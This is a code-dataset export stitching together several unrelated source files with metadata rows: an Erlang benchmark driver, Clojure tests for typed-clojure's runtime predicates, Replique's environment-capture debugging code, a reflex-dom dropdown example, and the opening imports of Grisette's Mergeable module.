%% Deploys each {Type, Query} template, substituting the worker Id for $.
deploy_queries(Socket, Id) ->
    Queries = basho_bench_config:get(rivus_cep_queries, []),
    lists:foreach(fun({Type, Query}) ->
        Q = re:replace(Query, "\\$", integer_to_list(Id), [global, {return, list}]),
        lager:info("Deploying query type: ~p, client: ~p, stmt: ~p", [Type, Id, Q]),
        execute(Type, Q, Socket) end, Queries).

%% load_query request: 'query' under benchmark_test, 'event' under
%% benchmark_event; crashes on send failure.
execute(query, Query, Socket) ->
    ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_test], [], []}}));
execute(event, Query, Socket) ->
    ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_event], [], []}})).

%% Sends an event; {ok, State} on success, gen_tcp error passed through.
send_event(Event, #state{socket = Socket} = State) ->
    case gen_tcp:send(Socket, term_to_binary({event, benchmark_test, Event})) of
        ok -> {ok, State};
        Error -> Error
    end.

%% Events are just the generated value; the key generator is ignored.
create_event(_KeyGen, ValueGen) ->
    ValueGen.

%% 'notify' operation: send one event, then block on the server's reply.
run(notify, KeyGen, ValueGen, #state{socket = Socket} = State) ->
    Event = create_event(KeyGen, ValueGen),
    case send_event(Event, State) of
        {error, E} ->
            {error, E, State};
        {ok, State} ->
            case gen_tcp:recv(Socket, 0) of
                {ok, _} -> {ok, State};
                {error, E} -> {error, E, State}
            end
    end.
|
734536ed465573f1dabb699d15e4b9b7060a95bc9329c575d74c75f8b19dd39f | typedclojure/typedclojure | pred.clj | (ns clojure.core.typed.test.pred
(:require
[clojure.test :refer :all]
[clojure.core.typed :as t]))
;; t/pred generates a runtime predicate from a static type; the tests below
;; exercise it over the main type constructors.
(def Number? (t/pred Number))

(t/defalias NumberAlias
  Number)

;; Class types: instance check; nil is not a Number.
(deftest class-pred-test
  (is (Number? 1))
  (is (not (Number? nil))))

;; Heterogeneous maps: :mandatory, :optional and :absent-keys constraints.
(deftest hmap-pred-test
  (is ((every-pred
         (t/pred
           (t/HMap)))
       {}
       {:a 'blah}))
  (is ((complement
         (t/pred
           (t/HMap :mandatory {:a Number})))
       {}))
  (is ((t/pred
         (t/HMap :mandatory {:a Number}))
       {:a 1}))
  (is ((every-pred
         (t/pred
           (t/HMap :optional {:a Number})))
       {:a 1}
       {}
       {:b 'a}))
  (is ((every-pred
         (t/pred
           (t/HMap :absent-keys #{:a})))
       {:b 'a}))
  (is (not
        ((every-pred
           (t/pred
             (t/HMap :absent-keys #{:a})))
         {:a 'a})))
  )

;; Heterogeneous vectors, including trailing * / :* rest types.
(deftest hvec-pred-test
  (is ((t/pred '[Number Number])
       [1 2]))
  (is ((every-pred
         (complement
           (t/pred '[Number Number])))
       ['a 2]
       []
       [1]
       [1 2 3]))
  (is ((every-pred
         (t/pred
           '[Number Number Number *]))
       [1 2]
       [1 2 3]
       [1 2 3 4 5 6 6 7 4 2 1]))
  (is ((every-pred
         (t/pred
           '[Number Number Number :*]))
       [1 2]
       [1 2 3]
       [1 2 3 4 5 6 6 7 4 2 1]))
  (is ((every-pred
         (complement
           (t/pred
             '[Number Number Number *])))
       []
       [1]
       [1 2 'a]
       [1 2 3 4 5 'a 6 7 4 2 1])))

;; Recursive types via t/Rec (nested vectors / nested maps of Number).
(deftest rec-pred-test
  (is ((every-pred
         (t/pred (t/Rec [x] (t/U '[x] Number))))
       1
       '[1]
       '[[1]]
       '[[[[[2.2]]]]]))
  (is ((every-pred
         (t/pred (t/Rec [x] (t/U '{:a x} Number))))
       1
       '{:a 1}
       '{:a {:a 1}}
       '{:a {:a {:a {:a {:a 1}}}}}))
  (is ((every-pred
         (complement
           (t/pred (t/Rec [x] (t/U '[x] Number)))))
       '[1 1]
       '[[1] [1]])))

;; Singleton (value) types: booleans, symbols, keywords, nil and numbers,
;; in both literal and (t/Value ...) forms.
(deftest singleton-pred-test
  (is ((t/pred true)
       true))
  (is ((t/pred (t/Value true))
       true))
  (is ((t/pred false)
       false))
  (is ((t/pred (t/Value false))
       false))
  (is ((t/pred 'sym)
       'sym))
  (is ((t/pred (t/Value sym))
       'sym))
  (is ((t/pred ':sym)
       ':sym))
  (is ((t/pred (t/Value :sym))
       ':sym))
  (is ((t/pred nil)
       nil))
  (is ((t/pred (t/Value nil))
       nil))
  (is ((t/pred '1)
       1))
  (is ((every-pred
         (complement
           (t/pred '1)))
       1.0))
  (is ((t/pred (t/Value 1))
       1)))

;; Count-bounded collection types.
(deftest countrange-pred-test
  (is ((every-pred
         (t/pred (t/CountRange 0)))
       nil
       []
       {}
       '()))
  (is ((every-pred
         (complement
           (t/pred (t/CountRange 0))))
       ; only supports clojure collections
       (into-array [])
       )))

;; Intersection types.
;; NOTE(review): the second and third assertions below are identical --
;; possibly one was meant to test a different value.
(deftest intersect-pred-test
  (is ((every-pred
         (t/pred (t/I Number Long)))
       1))
  (is ((every-pred
         (complement
           (t/pred (t/I Number Long))))
       1.1))
  (is ((every-pred
         (complement
           (t/pred (t/I Number Long))))
       1.1)))

;; Union types, including the empty union (t/U) and t/Nothing.
(deftest union-pred-test
  (is ((every-pred
         (t/pred (t/U Number Long)))
       1
       1.1))
  (is ((every-pred
         (complement
           (t/pred (t/U Number Long))))
       'a))
  (is ((every-pred
         (complement
           (t/pred t/Nothing))
         (complement
           (t/pred (t/U))))
       'a)))

;; Named type-function aliases resolve through t/pred.
(deftest tfn-name-test
  (is ((every-pred
         (t/pred (clojure.core.typed/Option Number)))
       nil
       1
       1.1)))

;; Seq types: accepts seqs, rejects vectors.
(deftest iseq-pred-test
  (is ((every-pred
         (t/pred (t/Seq Number)))
       '(1 2)))
  (is ((every-pred
         (complement
           (t/pred (t/Seq Number))))
       [1 2])))

;; t/Any accepts everything.
(deftest any-pred-test
  (is ((every-pred
         (t/pred t/Any))
       1 2 nil [1])))
| null | https://raw.githubusercontent.com/typedclojure/typedclojure/3aa381a764df3cc39dc0a312a1d9823eb6b7c564/typed/clj.checker/test/clojure/core/typed/test/pred.clj | clojure | only supports clojure collections | (ns clojure.core.typed.test.pred
(:require
[clojure.test :refer :all]
[clojure.core.typed :as t]))
;; t/pred generates a runtime predicate from a static type; the tests below
;; exercise it over the main type constructors.
(def Number? (t/pred Number))

(t/defalias NumberAlias
  Number)

;; Class types: instance check; nil is not a Number.
(deftest class-pred-test
  (is (Number? 1))
  (is (not (Number? nil))))

;; Heterogeneous maps: :mandatory, :optional and :absent-keys constraints.
(deftest hmap-pred-test
  (is ((every-pred
         (t/pred
           (t/HMap)))
       {}
       {:a 'blah}))
  (is ((complement
         (t/pred
           (t/HMap :mandatory {:a Number})))
       {}))
  (is ((t/pred
         (t/HMap :mandatory {:a Number}))
       {:a 1}))
  (is ((every-pred
         (t/pred
           (t/HMap :optional {:a Number})))
       {:a 1}
       {}
       {:b 'a}))
  (is ((every-pred
         (t/pred
           (t/HMap :absent-keys #{:a})))
       {:b 'a}))
  (is (not
        ((every-pred
           (t/pred
             (t/HMap :absent-keys #{:a})))
         {:a 'a})))
  )

;; Heterogeneous vectors, including trailing * / :* rest types.
(deftest hvec-pred-test
  (is ((t/pred '[Number Number])
       [1 2]))
  (is ((every-pred
         (complement
           (t/pred '[Number Number])))
       ['a 2]
       []
       [1]
       [1 2 3]))
  (is ((every-pred
         (t/pred
           '[Number Number Number *]))
       [1 2]
       [1 2 3]
       [1 2 3 4 5 6 6 7 4 2 1]))
  (is ((every-pred
         (t/pred
           '[Number Number Number :*]))
       [1 2]
       [1 2 3]
       [1 2 3 4 5 6 6 7 4 2 1]))
  (is ((every-pred
         (complement
           (t/pred
             '[Number Number Number *])))
       []
       [1]
       [1 2 'a]
       [1 2 3 4 5 'a 6 7 4 2 1])))

;; Recursive types via t/Rec (nested vectors / nested maps of Number).
(deftest rec-pred-test
  (is ((every-pred
         (t/pred (t/Rec [x] (t/U '[x] Number))))
       1
       '[1]
       '[[1]]
       '[[[[[2.2]]]]]))
  (is ((every-pred
         (t/pred (t/Rec [x] (t/U '{:a x} Number))))
       1
       '{:a 1}
       '{:a {:a 1}}
       '{:a {:a {:a {:a {:a 1}}}}}))
  (is ((every-pred
         (complement
           (t/pred (t/Rec [x] (t/U '[x] Number)))))
       '[1 1]
       '[[1] [1]])))

;; Singleton (value) types: booleans, symbols, keywords, nil and numbers,
;; in both literal and (t/Value ...) forms.
(deftest singleton-pred-test
  (is ((t/pred true)
       true))
  (is ((t/pred (t/Value true))
       true))
  (is ((t/pred false)
       false))
  (is ((t/pred (t/Value false))
       false))
  (is ((t/pred 'sym)
       'sym))
  (is ((t/pred (t/Value sym))
       'sym))
  (is ((t/pred ':sym)
       ':sym))
  (is ((t/pred (t/Value :sym))
       ':sym))
  (is ((t/pred nil)
       nil))
  (is ((t/pred (t/Value nil))
       nil))
  (is ((t/pred '1)
       1))
  (is ((every-pred
         (complement
           (t/pred '1)))
       1.0))
  (is ((t/pred (t/Value 1))
       1)))

;; Count-bounded collection types.
(deftest countrange-pred-test
  (is ((every-pred
         (t/pred (t/CountRange 0)))
       nil
       []
       {}
       '()))
  (is ((every-pred
         (complement
           (t/pred (t/CountRange 0))))
       ;; only supports clojure collections
       (into-array [])
       )))

;; Intersection types.
;; NOTE(review): the second and third assertions below are identical --
;; possibly one was meant to test a different value.
(deftest intersect-pred-test
  (is ((every-pred
         (t/pred (t/I Number Long)))
       1))
  (is ((every-pred
         (complement
           (t/pred (t/I Number Long))))
       1.1))
  (is ((every-pred
         (complement
           (t/pred (t/I Number Long))))
       1.1)))

;; Union types, including the empty union (t/U) and t/Nothing.
(deftest union-pred-test
  (is ((every-pred
         (t/pred (t/U Number Long)))
       1
       1.1))
  (is ((every-pred
         (complement
           (t/pred (t/U Number Long))))
       'a))
  (is ((every-pred
         (complement
           (t/pred t/Nothing))
         (complement
           (t/pred (t/U))))
       'a)))

;; Named type-function aliases resolve through t/pred.
(deftest tfn-name-test
  (is ((every-pred
         (t/pred (clojure.core.typed/Option Number)))
       nil
       1
       1.1)))

;; Seq types: accepts seqs, rejects vectors.
(deftest iseq-pred-test
  (is ((every-pred
         (t/pred (t/Seq Number)))
       '(1 2)))
  (is ((every-pred
         (complement
           (t/pred (t/Seq Number))))
       [1 2])))

;; t/Any accepts everything.
(deftest any-pred-test
  (is ((every-pred
         (t/pred t/Any))
       1 2 nil [1])))
|
ec4504097241d5654f4285813c10ec23d49680f3654288e83e55f5e78cd8136f | EwenG/replique | omniscient.clj | (ns replique.omniscient
(:require [replique.utils :as utils]
[replique.environment :as env]
[replique.omniscient-runtime]
[replique.elisp-printer :as elisp]
[replique.meta]
[replique.watch :as watch]))
;; Lazily-resolved vars from the ClojureScript side of Replique; dynaload
;; presumably defers the require so this ns also loads without a cljs REPL
;; -- see replique.utils/dynaload.
(def ^:private cljs-compiler-env (utils/dynaload 'replique.repl-cljs/compiler-env))
(def ^:private cljs-eval-cljs-form (utils/dynaload 'replique.repl-cljs/eval-cljs-form))
(def ^:private cljs-evaluate-form (utils/dynaload 'replique.repl-cljs/-evaluate-form))
(def ^:private cljs-munged (utils/dynaload 'cljs.compiler/munge))

;; clojure.core/*data-readers* clojure.core/*default-data-reader-fn*
;; Prevent dynamic vars used by the REPL/system from being captured
(def excluded-dyn-vars #{'clojure.core/*3 'clojure.core/*print-meta* 'clojure.core/*print-namespace-maps* 'clojure.core/*file* 'clojure.core/*command-line-args* 'clojure.core/*2 'clojure.core/*err* 'clojure.core/*print-length* 'clojure.core/*math-context* 'clojure.core/*e 'clojure.core/*1 'clojure.core/*source-path* 'clojure.core/*unchecked-math* 'clojure.spec/*explain-out* 'clojure.core/*in* 'clojure.core/*print-level* 'clojure.core/*warn-on-reflection* 'clojure.core/*out* 'clojure.core/*assert* 'clojure.core/*read-eval* 'clojure.core/*ns* 'clojure.core/*compile-path* 'clojure.core.server/*session* 'clojure.spec.alpha/*explain-out* 'clojure.core/pr 'replique.watch/*printed* 'replique.watch/*results* 'replique.omniscient-runtime/*captured-envs*})
(defn generated-local?
  "Truthy (the re-matches result) when `local` names a compiler-generated
  destructuring binding such as vec__123, map__4 or p__42."
  [local]
  (let [local-name (str local)]
    (re-matches #"^(vec__|map__|seq__|first__|p__)[0-9]+$" local-name)))
(defn env->locals
  "Returns a vector of the local names (symbols) visible in the macro
  expansion environment `env`, excluding compiler-generated destructuring
  temporaries. Handles both shapes: a cljs &env keeps its locals under
  :locals, a clj &env is itself the locals map."
  [env]
  (let [locals (if (utils/cljs-env? env)
                 (:locals env) env)]
    (->> (keys locals)
         (remove generated-local?)
         (into []))))
(defn locals-map
  "Builds a map from quoted local symbol (a (quote sym) form) to the bare
  symbol, ready for splicing into generated capture code."
  [locals]
  (into {}
        (map (fn [local] [(list 'quote local) local]))
        locals))
(defn dynamic-bindings-clj
  "Returns a quoted form that, at runtime, folds the current thread
  bindings into a map via the runtime reducer, skipping the vars in
  excluded-dyn-vars."
  []
  `(reduce-kv
     (partial replique.omniscient-runtime/dynamic-bindings-clj-reducer excluded-dyn-vars)
     {} (get-thread-bindings)))
(defn ns-map-filter-dynamic
  "Keeps only the entries of ns-map whose value carries a truthy :dynamic
  flag."
  [ns-map]
  (filter (fn [[_sym var-info]] (:dynamic var-info)) ns-map))
(defn dyn-vars
  "Returns a map of the dynamic vars visible in the cljs namespace analysis
  map `ns`: its :uses/:renames (resolved through the compiler env) plus its
  own :defs, keeping only entries flagged :dynamic."
  [comp-env ns]
  (let [uses (->> (select-keys ns [:uses :renames])
                  vals
                  (map (partial env/cljs-ns-map-resolve comp-env))
                  (map ns-map-filter-dynamic))
        defs (->> (select-keys ns [:defs])
                  vals
                  (map ns-map-filter-dynamic))]
    (->> (concat uses defs)
         (into {}))))

(defn dynamic-bindings-cljs
  "Builds the {(quote var-sym) var-sym} map of capturable dynamic vars for
  a cljs namespace, excluding the REPL/system vars in excluded-dyn-vars."
  [comp-env ns]
  (let [dyn-vars (->> (dyn-vars comp-env ns)
                      (map (comp :name second))
                      (remove (partial contains? excluded-dyn-vars)))]
    (zipmap (map (fn [x] `(quote ~x)) dyn-vars) dyn-vars)))

(defn dynamic-bindings
  "Dispatches on the macro env: cljs goes through the compiler-env
  analysis, clj reads the actual thread bindings."
  [env]
  (if (utils/cljs-env? env)
    (dynamic-bindings-cljs (env/->CljsCompilerEnv @@cljs-compiler-env) (:ns env))
    (dynamic-bindings-clj)))

(defn safe-ns-resolve
  "ns-resolve that returns nil instead of throwing when the symbol names a
  class that cannot be loaded."
  [comp-env ns sym]
  (try (env/ns-resolve comp-env ns sym)
       (catch ClassNotFoundException e nil)))
(defn capture-env
  "Code generator behind the capture-env macro: wraps `body` so that, at
  runtime, the surrounding locals, dynamic bindings and source position are
  captured into `capture-atom` (via reset!), together with any child envs
  captured while the body ran."
  [env form capture-atom body]
  (let [{:keys [file line column] :or {file *file*}} (meta form)
        position-str (str file ":" line ":" column)]
    `(let [captured-env# ~{:locals (locals-map (env->locals env))
                           ;; exclude dynamic vars that are used by the REPL/system
                           :bindings (dynamic-bindings env)
                           :position position-str}
           ;; run body with a fresh child-collection vector bound, and keep
           ;; both the body's result and the collected child envs
           [result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
                                      [(do ~@body)
                                       replique.omniscient-runtime/*captured-envs*])]
       (let [captured-env# (if (seq captured-envs#)
                             (assoc captured-env# :child-envs captured-envs#)
                             captured-env#)]
         (reset! ~capture-atom captured-env#))
       result#)))

(defn capture-child-env
  "Like capture-env, but for nested capture points: instead of resetting an
  atom, the captured env is appended to the dynamically-bound
  *captured-envs* vector of the enclosing capture (only when one is
  active, i.e. *captured-envs* is non-nil)."
  [env form body]
  (let [{:keys [file line column] :or {file *file*}} (meta form)
        position-str (str file ":" line ":" column)]
    `(let [captured-env# ~{:locals (locals-map (env->locals env))
                           ;; exclude dynamic vars that are used by the REPL/system
                           :bindings (dynamic-bindings env)
                           :position position-str}
           [result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
                                      [(do ~@body)
                                       replique.omniscient-runtime/*captured-envs*])]
       (when (some? replique.omniscient-runtime/*captured-envs*)
         (let [captured-env# (if (seq captured-envs#)
                               (assoc captured-env# :child-envs captured-envs#)
                               captured-env#)]
           (set! replique.omniscient-runtime/*captured-envs*
                 (conj replique.omniscient-runtime/*captured-envs* captured-env#))))
       result#)))
(defn get-binding-syms
  "Fetches the {:locals [...] :bindings [...]} symbol lists recorded in the
  captured env at `capture-atom`; for cljs the lookup is evaluated through
  the cljs REPL."
  [env capture-atom]
  (if (utils/cljs-env? env)
    (let [res (@cljs-eval-cljs-form (:repl-env env)
               `(replique.omniscient-runtime/get-binding-syms ~capture-atom))]
      ;; the cljs REPL result is a printed string of a printed form,
      ;; hence the double read-string
      (read-string (read-string res)))
    (replique.omniscient-runtime/get-binding-syms capture-atom)))

(defn bindings-reducer
  "Accumulates `binding-sym <lookup-form>` pairs for a generated `binding`
  vector, reading each value from the captured env's :bindings map."
  [capture-atom acc binding-sym]
  (conj acc binding-sym
        `(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
             :bindings (get (quote ~binding-sym)))))

(defn locals-reducer
  "Accumulates `local-sym <lookup-form>` pairs for a generated `let`
  vector, reading each value from the captured env's :locals map."
  [capture-atom acc local-sym]
  (conj acc local-sym
        `(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
             :locals (get (quote ~local-sym)))))

(defn with-env
  "Code generator behind the with-env macro: evaluates `body` inside a
  `binding`/`let` pair restoring the dynamic vars and locals previously
  captured in `capture-atom`."
  [env capture-atom body]
  ;; :repl-env may be nil when compiling files
  (when-not (and (utils/cljs-env? env) (nil? (:repl-env env)))
    (let [syms (get-binding-syms env capture-atom)
          locals-syms (:locals syms)
          binding-syms (:bindings syms)]
      `(binding ~(reduce (partial bindings-reducer capture-atom)
                         [] binding-syms)
         (let ~(reduce (partial locals-reducer capture-atom)
                       [] locals-syms)
           ~@body)))))
(defn captured-env-locals
  "Returns the locals recorded in the captured-env var named by
  `captured-env` (a string), resolved in namespace `ns` (falling back to
  the default namespace). Returns nil when captured-env is nil or cannot
  be resolved."
  [comp-env ns captured-env]
  (let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
               (env/find-ns comp-env (env/default-ns comp-env)))
        ;; Bug fix: the guard previously tested `capture-env` (the code-gen
        ;; fn var defined above, which is always truthy) instead of the
        ;; `captured-env` argument, so a nil argument crashed inside
        ;; (symbol nil) rather than short-circuiting to nil.
        resolved (when captured-env
                   (safe-ns-resolve comp-env ns (symbol captured-env)))]
    (when resolved
      (replique.omniscient-runtime/get-locals @resolved))))
(defn captured-env-locals-cljs
  "cljs counterpart of captured-env-locals: resolves the captured-env var
  through the compiler env, then evaluates a get_locals call in the cljs
  runtime via `repl-env`, returning the printed result wrapped as an elisp
  string. Returns nil when captured-env is nil, unresolved, or evaluation
  fails."
  [comp-env repl-env ns captured-env]
  (let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
               (env/find-ns comp-env (env/default-ns comp-env)))
        ;; Bug fix: the guard previously tested `capture-env` (the code-gen
        ;; fn var, always truthy) instead of the `captured-env` argument,
        ;; so a nil argument crashed inside (symbol nil).
        resolved (when captured-env
                   (safe-ns-resolve comp-env ns (symbol captured-env)))]
    (when (:name resolved)
      (let [{:keys [status value]} (@cljs-evaluate-form
                                    repl-env
                                    (format "replique.omniscient_runtime.get_locals(%s);"
                                            (@cljs-munged (str (:name resolved))))
                                    :timeout-before-submitted 100)]
        (when (= :success status)
          (elisp/->ElispString value))))))
(comment
(def env (atom nil))
(let [eeee 44]
(replique.interactive/capture-env env
44))
(replique.interactive/with-env env
eeee)
)
| null | https://raw.githubusercontent.com/EwenG/replique/45719ec95f463107f4c4ca79b7f83a7882b450cb/src/replique/omniscient.clj | clojure | clojure.core/*data-readers* clojure.core/*default-data-reader-fn*
Prevent dynamic vars used by the REPL/system from beeing captured
exclude dynamic vars that are used by the REPL/system
exclude dynamic vars that are used by the REPL/system
:repl-env may be nil when compiling files | (ns replique.omniscient
(:require [replique.utils :as utils]
[replique.environment :as env]
[replique.omniscient-runtime]
[replique.elisp-printer :as elisp]
[replique.meta]
[replique.watch :as watch]))
(def ^:private cljs-compiler-env (utils/dynaload 'replique.repl-cljs/compiler-env))
(def ^:private cljs-eval-cljs-form (utils/dynaload 'replique.repl-cljs/eval-cljs-form))
(def ^:private cljs-evaluate-form (utils/dynaload 'replique.repl-cljs/-evaluate-form))
(def ^:private cljs-munged (utils/dynaload 'cljs.compiler/munge))
(def excluded-dyn-vars #{'clojure.core/*3 'clojure.core/*print-meta* 'clojure.core/*print-namespace-maps* 'clojure.core/*file* 'clojure.core/*command-line-args* 'clojure.core/*2 'clojure.core/*err* 'clojure.core/*print-length* 'clojure.core/*math-context* 'clojure.core/*e 'clojure.core/*1 'clojure.core/*source-path* 'clojure.core/*unchecked-math* 'clojure.spec/*explain-out* 'clojure.core/*in* 'clojure.core/*print-level* 'clojure.core/*warn-on-reflection* 'clojure.core/*out* 'clojure.core/*assert* 'clojure.core/*read-eval* 'clojure.core/*ns* 'clojure.core/*compile-path* 'clojure.core.server/*session* 'clojure.spec.alpha/*explain-out* 'clojure.core/pr 'replique.watch/*printed* 'replique.watch/*results* 'replique.omniscient-runtime/*captured-envs*})
(defn generated-local? [local]
(re-matches #"^(vec__|map__|seq__|first__|p__)[0-9]+$" (str local)))
(defn env->locals [env]
(let [locals (if (utils/cljs-env? env)
(:locals env) env)]
(->> (keys locals)
(remove generated-local?)
(into []))))
(defn locals-map [locals]
(zipmap (map (partial list 'quote) locals) locals))
(defn dynamic-bindings-clj []
`(reduce-kv
(partial replique.omniscient-runtime/dynamic-bindings-clj-reducer excluded-dyn-vars)
{} (get-thread-bindings)))
(defn ns-map-filter-dynamic [ns-map]
(filter (fn [[k v]] (:dynamic v)) ns-map))
(defn dyn-vars [comp-env ns]
(let [uses (->> (select-keys ns [:uses :renames])
vals
(map (partial env/cljs-ns-map-resolve comp-env))
(map ns-map-filter-dynamic))
defs (->> (select-keys ns [:defs])
vals
(map ns-map-filter-dynamic))]
(->> (concat uses defs)
(into {}))))
(defn dynamic-bindings-cljs [comp-env ns]
(let [dyn-vars (->> (dyn-vars comp-env ns)
(map (comp :name second))
(remove (partial contains? excluded-dyn-vars)))]
(zipmap (map (fn [x] `(quote ~x)) dyn-vars) dyn-vars)))
(defn dynamic-bindings [env]
(if (utils/cljs-env? env)
(dynamic-bindings-cljs (env/->CljsCompilerEnv @@cljs-compiler-env) (:ns env))
(dynamic-bindings-clj)))
(defn safe-ns-resolve [comp-env ns sym]
(try (env/ns-resolve comp-env ns sym)
(catch ClassNotFoundException e nil)))
(defn capture-env [env form capture-atom body]
(let [{:keys [file line column] :or {file *file*}} (meta form)
position-str (str file ":" line ":" column)]
`(let [captured-env# ~{:locals (locals-map (env->locals env))
:bindings (dynamic-bindings env)
:position position-str}
[result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
[(do ~@body)
replique.omniscient-runtime/*captured-envs*])]
(let [captured-env# (if (seq captured-envs#)
(assoc captured-env# :child-envs captured-envs#)
captured-env#)]
(reset! ~capture-atom captured-env#))
result#)))
(defn capture-child-env [env form body]
(let [{:keys [file line column] :or {file *file*}} (meta form)
position-str (str file ":" line ":" column)]
`(let [captured-env# ~{:locals (locals-map (env->locals env))
:bindings (dynamic-bindings env)
:position position-str}
[result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
[(do ~@body)
replique.omniscient-runtime/*captured-envs*])]
(when (some? replique.omniscient-runtime/*captured-envs*)
(let [captured-env# (if (seq captured-envs#)
(assoc captured-env# :child-envs captured-envs#)
captured-env#)]
(set! replique.omniscient-runtime/*captured-envs*
(conj replique.omniscient-runtime/*captured-envs* captured-env#))))
result#)))
(defn get-binding-syms [env capture-atom]
(if (utils/cljs-env? env)
(let [res (@cljs-eval-cljs-form (:repl-env env)
`(replique.omniscient-runtime/get-binding-syms ~capture-atom))]
(read-string (read-string res)))
(replique.omniscient-runtime/get-binding-syms capture-atom)))
(defn bindings-reducer [capture-atom acc binding-sym]
(conj acc binding-sym
`(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
:bindings (get (quote ~binding-sym)))))
(defn locals-reducer [capture-atom acc local-sym]
(conj acc local-sym
`(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
:locals (get (quote ~local-sym)))))
(defn with-env [env capture-atom body]
(when-not (and (utils/cljs-env? env) (nil? (:repl-env env)))
(let [syms (get-binding-syms env capture-atom)
locals-syms (:locals syms)
binding-syms (:bindings syms)]
`(binding ~(reduce (partial bindings-reducer capture-atom)
[] binding-syms)
(let ~(reduce (partial locals-reducer capture-atom)
[] locals-syms)
~@body)))))
(defn captured-env-locals
  "Returns the locals recorded in the captured-env var named by
  `captured-env` (a string), resolved in namespace `ns` (falling back to
  the default namespace). Returns nil when captured-env is nil or cannot
  be resolved."
  [comp-env ns captured-env]
  (let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
               (env/find-ns comp-env (env/default-ns comp-env)))
        ;; Bug fix: the guard previously tested `capture-env` (the code-gen
        ;; fn var defined above, which is always truthy) instead of the
        ;; `captured-env` argument, so a nil argument crashed inside
        ;; (symbol nil) rather than short-circuiting to nil.
        resolved (when captured-env
                   (safe-ns-resolve comp-env ns (symbol captured-env)))]
    (when resolved
      (replique.omniscient-runtime/get-locals @resolved))))
(defn captured-env-locals-cljs
  "cljs counterpart of captured-env-locals: resolves the captured-env var
  through the compiler env, then evaluates a get_locals call in the cljs
  runtime via `repl-env`, returning the printed result wrapped as an elisp
  string. Returns nil when captured-env is nil, unresolved, or evaluation
  fails."
  [comp-env repl-env ns captured-env]
  (let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
               (env/find-ns comp-env (env/default-ns comp-env)))
        ;; Bug fix: the guard previously tested `capture-env` (the code-gen
        ;; fn var, always truthy) instead of the `captured-env` argument,
        ;; so a nil argument crashed inside (symbol nil).
        resolved (when captured-env
                   (safe-ns-resolve comp-env ns (symbol captured-env)))]
    (when (:name resolved)
      (let [{:keys [status value]} (@cljs-evaluate-form
                                    repl-env
                                    (format "replique.omniscient_runtime.get_locals(%s);"
                                            (@cljs-munged (str (:name resolved))))
                                    :timeout-before-submitted 100)]
        (when (= :success status)
          (elisp/->ElispString value))))))
(comment
(def env (atom nil))
(let [eeee 44]
(replique.interactive/capture-env env
44))
(replique.interactive/with-env env
eeee)
)
|
ab669a50822af429548133bceea5aadef50ebaa34cca9e2aa224e777c33c2cc2 | hansroland/reflex-dom-inbits | dropdown01.hs | {-# LANGUAGE OverloadedStrings #-}
import Reflex.Dom
import qualified Data.Text as T
import qualified Data.Map as Map
import Data.Monoid((<>))
import Data.Maybe (fromJust)
main :: IO ()
main = mainWidget bodyElement
bodyElement :: MonadWidget t m => m ()
bodyElement = el "div" $ do
el "h2" $ text "Dropdown"
text "Select country "
dd <- dropdown 2 (constDyn countries) def
el "p" blank
let selItem = result <$> value dd
dynText selItem
countries :: Map.Map Int T.Text
countries = Map.fromList [(1, "France"), (2, "Switzerland"), (3, "Germany"), (4, "Italy"), (5, "USA")]
result :: Int -> T.Text
result key = "You selected: " <> fromJust (Map.lookup key countries) | null | https://raw.githubusercontent.com/hansroland/reflex-dom-inbits/3bf4ccf43aa45c5df7d3ce42dae38955f657ca33/src/dropdown01.hs | haskell | # LANGUAGE OverloadedStrings # | import Reflex.Dom
import qualified Data.Text as T
import qualified Data.Map as Map
import Data.Monoid((<>))
import Data.Maybe (fromJust)
main :: IO ()
main = mainWidget bodyElement
bodyElement :: MonadWidget t m => m ()
bodyElement = el "div" $ do
el "h2" $ text "Dropdown"
text "Select country "
dd <- dropdown 2 (constDyn countries) def
el "p" blank
let selItem = result <$> value dd
dynText selItem
countries :: Map.Map Int T.Text
countries = Map.fromList [(1, "France"), (2, "Switzerland"), (3, "Germany"), (4, "Italy"), (5, "USA")]
result :: Int -> T.Text
result key = "You selected: " <> fromJust (Map.lookup key countries) |
ba92d62d5208944c0b3ddb43c9b6604a4200a831a0afc0bbb2f184d1553eb9cd | lsrcz/grisette | Mergeable.hs | # LANGUAGE CPP #
# LANGUAGE DataKinds #
# LANGUAGE DerivingVia #
# LANGUAGE FlexibleContexts #
# LANGUAGE FlexibleInstances #
{-# LANGUAGE GADTs #-}
# LANGUAGE KindSignatures #
# LANGUAGE LambdaCase #
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE QuantifiedConstraints #
{-# LANGUAGE RankNTypes #-}
# LANGUAGE ScopedTypeVariables #
# LANGUAGE StandaloneDeriving #
# LANGUAGE Trustworthy #
# LANGUAGE TypeApplications #
# LANGUAGE TypeOperators #
# LANGUAGE UndecidableInstances #
-- |
Module : . Core . Data . Class .
Copyright : ( c ) 2021 - 2023
-- License : BSD-3-Clause (see the LICENSE file)
--
-- Maintainer :
-- Stability : Experimental
Portability : GHC only
module Grisette.Core.Data.Class.Mergeable
( -- * Merging strategy
MergingStrategy (..),
*
Mergeable (..),
Mergeable1 (..),
rootStrategy1,
Mergeable2 (..),
rootStrategy2,
Mergeable3 (..),
rootStrategy3,
Mergeable' (..),
derivedRootStrategy,
-- * Combinators for manually building merging strategies
wrapStrategy,
product2Strategy,
DynamicSortedIdx (..),
StrategyList (..),
buildStrategyList,
resolveStrategy,
resolveStrategy',
)
where
import Control.Exception
import Control.Monad.Cont
import Control.Monad.Except
import Control.Monad.Identity
import qualified Control.Monad.RWS.Lazy as RWSLazy
import qualified Control.Monad.RWS.Strict as RWSStrict
import Control.Monad.Reader
import qualified Control.Monad.State.Lazy as StateLazy
import qualified Control.Monad.State.Strict as StateStrict
import Control.Monad.Trans.Maybe
import qualified Control.Monad.Writer.Lazy as WriterLazy
